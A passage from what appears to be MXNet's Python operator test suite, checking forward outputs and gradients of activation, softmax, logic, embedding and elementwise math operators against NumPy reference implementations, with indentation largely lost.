assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
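# The expected gradient above is just softmax cross-entropy against a
# label-smoothed target (a sketch of the algebra, assuming K classes and
# smoothing weight alpha): t_k = 1 - alpha for the true class and
# alpha / (K - 1) otherwise, and the gradient is p - t, so
# grad_out - softmax_out == -t, which is what expected_grad_out encodes.
def _smoothed_target(k, K, alpha):
    t = np.full((K,), alpha / (K - 1))
    t[k] = 1.0 - alpha
    return t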
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
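# A numerical cross-check of the hand-derived gradient above (a sketch,
# not part of the test): for nonzero x the (data != 0) term is 1, so with
# g(x) = 4 - (x + 2) * 2 / 5 - 0.8 - 1 and f(x) = 2 / g(x) the derivative
# is f'(x) = 2 * (2 / 5) / g(x) ** 2; the extra factor of 2 in npout_grad
# comes from the out_grads of np.ones(shape) * 2 passed above.
def _check_scalarop_grad(x=5.0, eps=1e-6):
    f = lambda v: 2.0 / (4 - (v + 2) * 2 / 5 - 0.8 - 1)
    numeric = (f(x + eps) - f(x - eps)) / (2 * eps)   # central difference
    analytic = 2 * (2.0 / 5) / (4 - (x + 2) * 2 / 5 - 0.8 - 1) ** 2
    assert abs(numeric - analytic) < 1e-4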
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
    fc_bias = mx.nd.random.uniform(shape=(10,), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
    res = np.dot(data_np, fc_weight_np) + fc_bias_np
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
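# Sketch: FullyConnected flattens every axis after the first, so for the
# (5, 5, 5, 13) input above it computes y = x.reshape(5, -1).dot(W.T) + b, which
# is exactly the reference `res` built by hand. `_sketch_fully_connected` is an
# illustrative numpy-only restatement, not invoked by the test suite.
def _sketch_fully_connected(x, weight, bias):
    # weight has shape (num_hidden, prod(trailing dims)), as in mx.sym.FullyConnected.
    return np.dot(x.reshape(x.shape[0], -1), weight.T) + bias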
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
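# The elu branch of fleaky_relu_grad relies on the identity
# d/dx [slope * (exp(x) - 1)] = slope * exp(x) = y + slope for x < 0, which is why
# the reference gradient can be expressed through the forward output y alone.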
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
    def fselu_grad(grad, x, y):
        # d/dx selu(x) is lamb for x > 0 and lamb * alpha * exp(x) for x < 0; since
        # y = lamb * alpha * expm1(x) there, the latter equals y + lamb * alpha.
        neg_indices = x < 0
        out = np.ones(x.shape).astype(x.dtype) * lamb
        out[neg_indices] = y[neg_indices] + alpha * lamb
        return out * grad
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
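# Sketch: the tanh form above is the Hendrycks & Gimpel approximation to the exact
# GELU 0.5 * x * (1 + erf(x / sqrt(2))). `_sketch_gelu_tanh_vs_erf` is an
# illustrative numpy-only comparison of the two, not invoked by the test suite.
def _sketch_gelu_tanh_vs_erf(x):
    from math import erf, sqrt
    exact = 0.5 * x * (1.0 + np.vectorize(erf)(x / sqrt(2.0)))
    inner = 0.7978845608028654 * (x + 0.044715 * np.power(x, 3))
    approx = 0.5 * x * (1.0 + np.tanh(inner))
    return np.max(np.abs(exact - approx))  # stays small (~1e-3) on moderate ranges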
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
        # hard_sigmoid is not differentiable where alpha*x + beta hits 0 or 1, i.e. at
        # x = -beta/alpha = -2.5 and x = (1 - beta)/alpha = 2.5; nudge inputs off the kinks
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
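# Sketch: the one-hot matrix above encodes the standard view of an embedding
# lookup as a matrix product, which is why the weight gradient is checked against
# np.dot(np_onehot.T, np_grad) (a scatter-add of output gradients into the rows
# that were looked up). `_sketch_embedding_as_matmul` is an illustrative
# numpy-only restatement, not invoked by the test suite.
def _sketch_embedding_as_matmul(indices, weight):
    onehot = np.zeros((indices.size, weight.shape[0]))
    onehot[np.arange(indices.size), indices] = 1.0
    return onehot.dot(weight)  # elementwise-equal to weight[indices]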
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
    out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    # d/dx sign(x) is 0 almost everywhere, so the expected input gradient is all zeros.
    npout_grad = np.zeros(shape)
    exe_test.backward(out_grad)
    assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
